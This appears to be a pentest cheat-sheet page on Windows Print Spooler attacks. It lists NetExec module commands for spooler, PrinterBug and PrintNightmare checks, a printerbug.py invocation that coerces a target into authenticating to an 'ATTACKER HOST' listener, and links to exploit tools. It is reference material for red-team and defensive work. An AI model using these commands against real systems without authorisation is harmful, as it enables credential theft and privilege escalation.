Print Spooler

Spooler is running

nxc smb <ip> -u 'user' -p 'pass' -M spooler

https://bsky.app/profile/itm4n.bsky.social/post/3lcipb7lq4k2v

Printer Bug

LogoMS-RPRN abuse (PrinterBug)The Hacker Recipes
MisconfigurationTrustee and Resource Delegation
nxc smb IP_RANGE -u username -p password -M printerbug -o LISTENER=ATTACKER_IP

or with printerbug.py

printerbug.py 'DOMAIN'/'USER':'PASSWORD'@'TARGET' 'ATTACKER HOST'

NetNTLMV1 ?

LogoGitHub - NotMedic/NetNTLMtoSilverTicket: SpoolSample -> Responder w/NetNTLM Downgrade -> NetNTLMv1 -> NTLM -> Kerberos Silver TicketGitHub

PrintNightmare

LogoA Practical Guide to PrintNightmare in 2024itm4n’s blog
nxc <protocol> <target(s)> -u Administrator -p 'P@ssw0rd' -M spooler -M printnightmare

Itwasalladream

LogoGitHub - byt3bl33d3r/ItWasAllADream: A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCEGitHub

Exploit

Windows Exploit

CVE-2021-34481

LogoGitHub - vpn28/CVE-2021-34481: Check patch for CVE-2021-34481GitHub
LogoGitHub - jacob-baines/concealed_position: Bring your own print driver privilege escalation toolGitHub
LogoA Practical Guide to PrintNightmare in 2024itm4n’s blog

SpoolSploit

LogoGitHub - BeetleChunks/SpoolSploit: A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.GitHub
PreviousWindows ExploitNextLOL Bins

Last updated